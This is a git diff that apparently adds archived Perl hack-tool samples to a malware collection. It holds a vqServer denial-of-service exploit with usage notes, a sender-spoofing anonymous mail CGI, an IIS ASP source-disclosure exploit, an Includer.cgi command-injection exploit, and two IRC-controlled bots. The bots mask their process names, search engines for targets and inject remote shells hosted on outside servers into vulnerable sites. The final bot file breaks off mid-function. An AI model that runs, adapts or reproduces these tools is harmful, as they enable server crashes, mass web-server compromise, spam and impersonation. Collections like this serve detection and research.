+it probably is in the linux/unix version and prior versions too.
+
+/-|=[testing it]=|-\
+To test this vulnerability, send a GET request with 65000 characters.
+So:
+GET /AAA (hit return =)
+Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste 
+that much characters in their browser fields (www.server.com/AAA) you will 
+have to use something like Telnet. 
+You can easily program something to print 65000 chars in Perl:
+open (OUT, ">$ARGV[0]");
+print OUT ("GET /");
+print OUT ("A" x 65000);
+then it's just a cut and paste.
+Or you can use the example code below
+
+/-|=[fix]=|-\
+the latest edition of vqServer (1.9.47) is unaffected by this. It is available 
+for download at www.vqsoft.com
+
+/-|=[notes]=|-\
+PUT, POST and the Administration port do not seem to be affected by a high 
+amount of characters. The Windows version needed a reinstall every five 
+or so crashes. A reboot or total shutdown did not help. 
+
+/-|=[exploit code]=|-\
+sinfony quickly wrote some code so you can see if you're vulnerable.
+
+# DoS exploit for vqServer 1.4.49 
+# This vulnerability was discovered by nemesystm 
+# (auto45040@hushmail.com)
+#
+# code by: sinfony    (chinesef00d@hotmail.com) 
+# [confess.sins.labs] (http://www.ro0t.nu/csl) 
+# and DHC member	    
+#
+# kiddie quote of the year:
+# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it 
+
+die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
+usage: $0 <host> \n" 
+if $#ARGV != 0; 
+
+use IO::Socket;
+
+$host = $ARGV[0];
+$port = 80;
+
+print "Connecting to $host on port $port...\n"; 
+$suck = IO::Socket::INET->
+	new(Proto=>"tcp", 
+	PeerAddr=>$host,
+	PeerPort=>$port)
+	|| die "$host isnt a webserver you schmuck.\n"; 
+
+$a = A;
+$send = $a x 65000;
+	print "Connected, sending exploit.\n";
+	print $suck "GET /$send\n"; 
+sleep(3); 
+	print "Exploit sent. vqServer should be dead.\n";
+close($suck)
\ No newline at end of file
diff --git a/Perl/HackTool.Perl.AnonyMail b/Perl/HackTool.Perl.AnonyMail
new file mode 100644
index 00000000..fa3d4833
--- /dev/null
+++ b/Perl/HackTool.Perl.AnonyMail
@@ -0,0 +1,101 @@
+# anonymail - fuck, i was bored like shit. napalmed.
+$script_url = "/am.cgi";
+$sendmail = "/usr/sbin/sendmail";
+@referers = ("");
+$admin = "napalmed@fuck.au";
+@friends = ("");
+$good_refer = 0;
+if($ENV{REQUEST_METHOD} eq 'GET')
+{
+&print_form;
+}
+elsif($ENV{REQUEST_METHOD} eq 'POST')
+{
+        foreach $referer(@referers)
+        {
+        if($ENV{HTTP_REFERER} =~ /$referer/i) { $good_refer = 1; }
+        }
+        if($good_refer != 1) { &error; }
+&parse_form;
+&send_mail;
+}
+else
+{
+&error;
+}
+sub print_form
+{
+print "Content-type: text/html\n\n";
+print "<HTML><HEAD><TITLE>jhve elohim meth :: god is dead</TITLE></HEAD>\n";
+print "<BODY><B> ANONYMOUS MAIL. FUCK YOU </B><BR>\n";
+print "
+<CENTER>
+<FORM ACTION=\"$script_url\" METHOD=\"POST\" NAME=\"mail_form\">
+<TABLE BORDER=5><TH COLSPAN=2>BITCH</TH>
+<tr><td>Send To:</td><td><INPUT TYPE=\"text\" NAME=\"to\" SIZE=30></td></tr>
+<tr><td>From Address:</td><td><INPUT TYPE=\"text\" NAME=\"from_addy\" SIZE=30></td></tr>
+<tr><td>From Name:</td><td><INPUT TYPE=\"text\" NAME=\"from_name\" SIZE=30></td></tr>
+<tr><td>Subject:</td><td><INPUT TYPE=\"text\" NAME=\"subject\" SIZE=30></td></tr>
+<tr><td colspan=2>Body:<br><TEXTAREA NAME=\"body\" WRAP=VIRTUAL ROWS=3 COLS=35></TEXTAREA></td></tr>
+<tr><td colspan=2 align=center><INPUT TYPE=\"submit\" VALUE=\" Send Mail \">
+<INPUT TYPE=\"reset\" VALUE=\" Clear \"></TD></TR></TABLE></FORM></CENTER>\n";
+print "<BR><HR><BR></BODY></HTML>\n";
+exit;
+}
+sub send_mail
+{
+open (MAIL, "|$sendmail -t") || &error;
+print MAIL "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
+print MAIL "Reply-To: $input{'from_addy'}\n";
+print MAIL "X-Mailer: anonmail.bitch\n";
+print MAIL "To: $input{'to'}\n";
+print MAIL "Subject: $input{'subject'}\n";
+print MAIL "Content-Type: text/plain; charset=us-ascii\n";
+print MAIL "Content-Transfer-Encoding: 7bit\n\n";
+
+print MAIL "$input{'body'}";
+close (MAIL);
+
+print "Content-type: text/html\n\n";
+print "Below is what you sent to $input{to}\n<pre>\n";
+print "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
+print "Reply-To: $input{'from_addy'}\n";
+print "To: $input{'to'}\n";
+print "Subject: $input{'subject'}\n\n";
+print "$input{'body'}";
+exit;
+
+}
+
+sub parse_form {
+
+   read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
+   if (length($buffer) < 5) {
+         $buffer = $ENV{QUERY_STRING};
+    }
+   @pairs = split(/&/, $buffer);
+   foreach $pair (@pairs) {
+      ($name, $value) = split(/=/, $pair);
+
+        $value =~ tr/+/ /;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/<!--(.|\n)*-->//g;
+        $input{$name} = $value;
+   }
+        if($input{'to'} =~ /microsoft.com/i) { &error; }
+
+        foreach $friend(@friends)
+        {
+        if($input{'to'} =~ /$friend/i) { &error; }
+        }
+}
+
+
+
+
+sub error
+{
+print "Content-type: text/html\n\n";
+print "<BR>An error occured while processing the script.\n";
+exit;
+}
\ No newline at end of file
diff --git a/Perl/HackTool.Perl.Aspviewer b/Perl/HackTool.Perl.Aspviewer
new file mode 100644
index 00000000..e6716a8f
--- /dev/null
+++ b/Perl/HackTool.Perl.Aspviewer
@@ -0,0 +1,85 @@
+#----------------------------------------------------------------#
+# [ISMyASP]                                                      #
+# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
+# and null.htw bug                                               # 
+# LoWNOISE Colombia 5/2000                                       #
+# Efrain 'ET' Torres et@cyberspace.org                           #
+#----------------------------------------------------------------#
+# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb.                      #
+#----------------------------------------------------------------#
+# Some f() from wwwboard.pl by S.Sparling                        #
+#----------------------------------------------------------------#
+
+use Socket;  
+
+$port=80; 
+
+if (!($ARGV[0])) {
+  print "\n[ISMyASP]\n";               
+  print "$0 http://host/view.asp \n";
+  print "ET LoWNOISE Colombia.\n";
+  exit;
+}
+
+$url=$ARGV[0]; 
+
+chop($url) if $url =~ /\n$/;
+print "url: $url\n";
+
+$remote = $url;
+$remote =~ s/http\:\/\///g;
+$remote =~ s/\/([^>]|\n)*//g;
+print "host: $remote\n";
+
+$path = $url;
+$path =~ s/http\:\/\///g;
+$path =~ s/$remote//g;
+print "path: $path\n";
+
+
+$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
+             #REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
+             #READ THE CERBERUS CISADV000327.
+
+$submit = "GET $path";
+
+$i=0;
+while($i < $spaces)
+{
+   $submit= "$submit%20";
+   $i++;
+  
+}
+$submit= "$submit.htr HTTP/1.0\n\n";
+
+print "======Trying ism.dll buffer truncation...\n";
+print "submit: $submit\n\n";
+
+&post_message;
+
+print "======Trying null.htw...\n";
+$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
+print "submit: $submit\n\n";
+
+&post_message;
+
+sub post_message
+{
+   if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
+   die("No port specified.") unless $port;
+   $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
+   $paddr = sockaddr_in($port, $iaddr);
+   $proto = getprotobyname('tcp');
+   socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
+   connect(SOCK, $paddr) || die("Unable to connect: $!");
+   send(SOCK,$submit,0);
+   printf "\n======Waiting for reply [pray]....\n\n";
+   while(<SOCK>) {
+      print $_;
+   }
+   close(SOCK);
+}
+
+print "\n\n======THE END.   [LoWNOISE]\n";
+exit;
+#:) narco.guerrilla&gov.sucks.co       (huge :x to PO-K)     
diff --git a/Perl/HackTool.Perl.Cgiluder.b b/Perl/HackTool.Perl.Cgiluder.b
new file mode 100644
index 00000000..e29d9c41
--- /dev/null
+++ b/Perl/HackTool.Perl.Cgiluder.b
@@ -0,0 +1,85 @@
+#
+# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
+#
+# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
+#
+# I think the bug was discovered by Francisco Alisson.
+#
+# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
+#
+# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
+#
+##########################################################################
+# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
+# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
+# [?] Insert command: id
+# [+] Conecting to 127.0.0.1
+# [+] Connected to 127.0.0.1
+# [+] Injecting command ...
+# uid=500(kc) gid=500(kc) gruppi=500(kc)
+# [kc@K-C0d3r xpl]$
+##########################################################################
+
+use IO::Socket;
+
+sub Usage {
+print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
+print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
+exit;
+}
+
+if (@ARGV < 3)
+{
+ Usage();
+}
+
+
+$host = @ARGV[0];
+$path = @ARGV[1];
+print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
+print "[?] Insert command: ";
+$command = <STDIN>;
+$type = @ARGV[2];
+
+if ($type > 2)
+{
+ Usage();
+}
+
+
+print "[+] Conecting to $host\n";
+
+if ($type = 1)
+{
+$injection = "$host$path?|$command|";
+$socket = new IO::Socket::INET (PeerAddr => "$host",
+                                PeerPort => 80,
+                                Proto => 'tcp');
+                                die unless $socket;
+print "[+] Connected to $host\n";
+print "[+] Injecting command ...\n";
+print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
+while (<$socket>)
+{
+ print $_;
+ exit;
+}
+}
+
+if ($type = 2)
+{
+$injection = "$host$path?template=|$command|";
+$socket = new IO::Socket::INET (PeerAddr => "$host",
+                                PeerPort => 80,
+                                Proto => 'tcp');
+                                die unless $socket;
+print "[+] Connected to $host\n";
+print "[+] Injecting command\n";
+print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
+while (<$socket>)
+{
+ print $_;
+ exit;
+}
+}
+
diff --git a/Perl/HackTool.Perl.IrBot.c b/Perl/HackTool.Perl.IrBot.c
new file mode 100644
index 00000000..bb1d07f6
--- /dev/null
+++ b/Perl/HackTool.Perl.IrBot.c
@@ -0,0 +1,248 @@
+#################################################################################################################################################
+# 
+# RFi Scanner 2007 by Morgan.. 
+#
+# <@Morgan> !scan page.php?id= "Powered by RGameScript"
+# <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google 
+# <NewScan_Google> [Scan] Google Found: 1656 Sites!
+# <NewScan_Google> [Scan] Cleaned results: 36 Sites!
+# <NewScan_Google> [Scan] Exploting started! 
+# <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? 
+# <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686 
+# <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? 
+# <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 
+# <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript"
+#
+#
+# Enjoy!
+# /Morgan
+#
+# irc.realworm.net - #Morgan
+#################################################################################################################################################
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+
+###############CONFIGURATION###################
+my $processo = "/usr/local/apache/bin/nscan -DSSL";
+my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD 
+my $server="irc.x-reaction.net";
+my $porta="6667";
+my $nick="x____H264____x";
+my $chan="#a";
+###############END OF CONFIGURATION############
+
+my $verbot = "2.0";
+my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this
+my $pid=fork;
+exit if $pid;
+$0="$processo"."\0"x16;
+my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
+$sk->autoflush(1);
+print $sk "NICK $nick\r\n";
+print $sk "USER Google 8 *  : Google : google@google.it : Google :Google\r\n";
+print $sk "JOIN $chan\r\n";
+print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan <bug> <dork>\r\n";
+
+while($line = <$sk>){
+
+$line =~ s/\r\n$//;
+if ($line=~ /^PING \:(.*)/)
+{
+print "PONG :$1";
+print $sk "PONG :$1";
+}
+
+if ($line=~ /PRIVMSG $chan :.deletebot/){
+stampa($sk, "QUIT");
+}
+
+if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my ($type,$space);
+my %hosts;
+stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google ");
+my @glist=&google($dork);
+stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!");
+push(my @tot, @glist);
+my @puliti=&unici(@tot);
+stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!");
+stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %30==0){
+}
+if ($contatore==$uni-1){
+stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork");
+}
+my $test="http://".$sito.$bug.$cmd."?";
+my $print="http://".$sito.$bug.$printcmd."?";
+my $vuln="http://".$sito.$bug."";
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /31337/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space,$ker)=split(/\,/,$x);
+stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print ");
+stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker  ");
+checksafemode("$print");}}
+elsif($re =~ /31337/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space,$ker)=split(/\,/,$x);
+stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 3]14 $print ");
+stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker  ");
+checksafemode("$print");}}
+}}}
+exit;
+}}}
+
+
+sub stampa()
+{
+if ($#_ == '1') {
+my $sk = $_[0];
+print $sk "$_[1]\n";
+} else {
+print $sk "$_[0]\n";
+}}
+
+sub os(){
+my $sito=$_[0];
+my $Res=query($sito);
+my $type;
+my $space;
+my $ker;
+my $str;
+while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
+$type=$1;
+}
+while($Res=~m/<br>Kernel:(.+?)\<br>/g){
+$ker=$1;
+}
+while($Res=~m/<br>Free:(.+?)\<br>/g){
+$space=$1;
+}
+$str=$type.",".$space.",".$ker;
+return $str;
+}
+sub google(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+
+sub checksafemode($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+}
+
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}
+return @unici;
+}
+
diff --git a/Perl/HackTool.Perl.IrBot.d b/Perl/HackTool.Perl.IrBot.d
new file mode 100644
index 00000000..b14f455e
--- /dev/null
+++ b/Perl/HackTool.Perl.IrBot.d
@@ -0,0 +1,438 @@
+#Mic22 Is Here!
+
+use IO::Socket::INET;
+use HTTP::Request;
+use LWP::UserAgent;
+
+my $processo = "/usr/local/apache/bin/httpd -DSSL";
+my $cmd="http://by-gardenfox.t35.com/c99.txt?";
+my $server="irc.milw0rm.com";
+my $porta="6667";
+my $nick="[ScaN-RoX]";
+my $canale="#army";
+my $verbot = "6.51";
+my @adms=("joiner");
+my $pid=fork;
+exit if $pid;
+$0="$processo"."\0"x16;
+my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
+$sk->autoflush(1);
+print $sk "NICK $nick\r\n";
+print $sk "USER Shinchi 13 *  : henca : henca@prohosts.org : Shinchi :henca\r\n";
+print $sk "JOIN $canale\r\n";
+
+while($line = <$sk>){
+
+$line =~ s/\r\n$//;
+if ($line=~ /^PING \:(.*)/)
+{
+print "PONG :$1";
+print $sk "PONG :$1";
+}
+
+if ($line=~ /PRIVMSG $canale :.out/){
+stampa($sk, "QUIT");
+}
+
+
+if ($line=~ /PRIVMSG $canale :.help/){
+stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 6Scanner RFI Ver $verbot (C)Mic22 , 3Color By 10Shinchi12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2ketik 4.scan Bug Dork 12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.engine 2Untuk melihat searce engine yang digunakan 12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13bantuan] 2Ketik 7.mwultimi 2Untuk Melihat Bug di milworm 12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.info 2Untuk Melihat status Bot/System 12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.out 2Untuk Matikan Bot 12::.");
+}
+
+if ($line=~ /PRIVMSG $canale :.info/){
+my $sysos = `uname -sr`;
+my $uptime = `uptime`;
+if ($sysos =~ /freebsd/i ) {
+$sysname = `hostname`;
+$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; 
+$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
+chomp($memory);
+chomp($swap);
+}
+elsif ( $sysos =~ /linux/i ) {
+$sysname = `hostname -f`;
+$memory = `free -m |grep -i mem | awk '{print \$2}'`;
+$swap = `free -m |grep -i swap | awk '{print \$2}'`;
+chomp($swap);
+chomp($memory);
+}
+else {
+$sysname ="No Found";; 
+$memory ="No found";
+$swap ="No Found";
+}
+$uptime=~s/\n//g;
+$sysname=~s/\n//g;
+$sysos=~s/\n//g;
+stampa($sk, "PRIVMSG $canale :12.::[13Info] Server: $server :| - $porta12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Info] SO/Hostname:12 $sysos - $sysname12::."); 
+stampa($sk, "PRIVMSG $canale :12.::[13Info] Process/PID:12 $processo - $$12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Info] Uptime:12 $uptime12::."); 
+stampa($sk, "PRIVMSG $canale :12.::[13Info] Memory/Swap:12 $memory - $swap12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Info] Perl Version/BOT:12 $] - $verbot12::."); 
+}
+
+
+if ($line=~ /PRIVMSG $canale :.engine/){
+stampa($sk, "PRIVMSG $canale :12.::[13Engine] 2Google, Yahoo, MsN, Altavista, Libero, AllTheWeb, AsK, UoL, AoL 12::.");
+}
+
+if ($line=~ /PRIVMSG $canale :.mwultimi/){
+my @ltt=();
+my @bug=();
+my $x; 
+my $page="";
+my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; 
+print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; 
+my @r = <$socke>;
+$page="@r";
+close($socke); 
+while ($page =~  m/<title>(.*)</g){
+$x = $1;
+if ($x =~ /\&lt\;/) {
+$x =~ s/\&lt\;/</g;
+}
+if ($x !~ /milw0rm/) {
+push (@bug,$x);
+}}
+while ($page =~  m/<link.*expl.*([0-9]...)</g) { 
+if ($1 !~ m/milw0rm.com|exploits|en/){
+push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+}}
+stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] 7Last Bug di milw0rm 12::."); 
+foreach $x (0..(@ltt - 1)) {
+stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] list Bug Milw0rm $bug[$x] - $ltt[$x] 12::.");
+sleep 1;
+}}
+
+if ($line=~ /PRIVMSG $canale :.scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my ($type,$space);
+my %hosts;
+stampa($sk, "PRIVMSG $canale :12.::[13Dork] $dork12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Bug] $bug12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Loading] 2Tunggu yach.. Yayang Lagi Mulai neh!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[13Google] Sabar yach Say.. Lagi scan nih!12::.");
+my @glist=&google($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13Yahoo] Sabar yach Say.. Lagi scan nih!12::.");
+my @ylist=&yahoo($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13Msn] Sabar yach Say.. Lagi scan nih!12::.");
+my @mlist=&msn($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13Altavista] Sabar yach Say.. Lagi scan nih!12::.");
+my @alist=&altavista($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13Libero] Sabar yach Say.. Lagi scan nih!12::.");
+my @llist=&libero($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13AllTheWeb] Sabar yach Say.. Lagi scan nih!12::.");
+my @allist=&alltheweb($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13AsK] Sabar yach Say.. Lagi scan nih!12::.");
+my @asklist=&ask($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13UoL] Sabar yach Say.. Lagi scan nih!12::.");
+my @uollist=&uol($dork);
+stampa($sk, "PRIVMSG $canale :12.::[13AoL] Sabar yach Say.. Lagi scan nih!12::.");
+my @aollist=&aol($dork);
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 2Lagi Scan untuk kamu say [9Dork] $dork12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Google ".scalar(@glist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Yahoo ".scalar(@ylist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] MsN ".scalar(@mlist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Altavista ".scalar(@alist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Libero ".scalar(@llist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] All-The-Web ".scalar(@allist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Ask ".scalar(@asklist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] UoL ".scalar(@uollist)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] AoL ".scalar(@aollist)." Situs!12::.");
+push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 12Total Scan 9,1H1,9e9,1n1,9C9,1a  ".scalar(@tot)." Situs!12::.");
+my @puliti=&unici(@tot);
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 7Total Pencarian 9,1H1,9e9,1n1,9C9,1a ".scalar(@puliti)." Situs!12::.");
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Vulnerability 9,1H1,9e9,1n1,9C9,1a Scan!12::.");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %30==0){ 
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Injekя┐╜ cinta ".$contatore." dari ".$uni. " situs12::.");
+}
+if ($contatore==$uni-1){
+stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Selasai [13Dork] $dork12::.");
+}
+my $test="http://".$sito.$bug.$cmd."?";
+my $print="http://".$sito.$bug."http://by-gardenfox.t35.com/c99.txt"."?";
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /Mic22/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+stampa($sk, "PRIVMSG $canale :12.::[13Safe(12 OFF ) 4Sys(7 $type ) 6Free(14 $space )] $print12::.");
+stampa($sk, "PRIVMSG MoKu :13.::[12Safe(4 OFF ) 7Sys(6 $type ) 14Free(6 $space )] $print12::.");
+}}
+elsif($re =~ /Mic22/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+stampa($sk, "PRIVMSG $canale :12.::[2Safe(4 ON ) 6Sys(7 $type ) 7Free(6 $space )] $print12::.");
+}}
+}}}
+exit;
+}}}
+
+
+sub stampa()
+{
+if ($#_ == '1') {
+my $sk = $_[0];
+print $sk "$_[1]\n";
+} else {
+print $sk "$_[0]\n";
+}}
+
+sub os(){
+my $sito=$_[0];
+my $Res=query($sito);
+my $type;
+my $free;
+my $str;
+while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
+$type=$1;
+}
+while($Res=~m/<br>Free:(.+?)\<br>/g){
+$free=$1;
+}
+$str=$type.",".$free;
+return $str;
+}
+
+sub aol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=100;$b++){
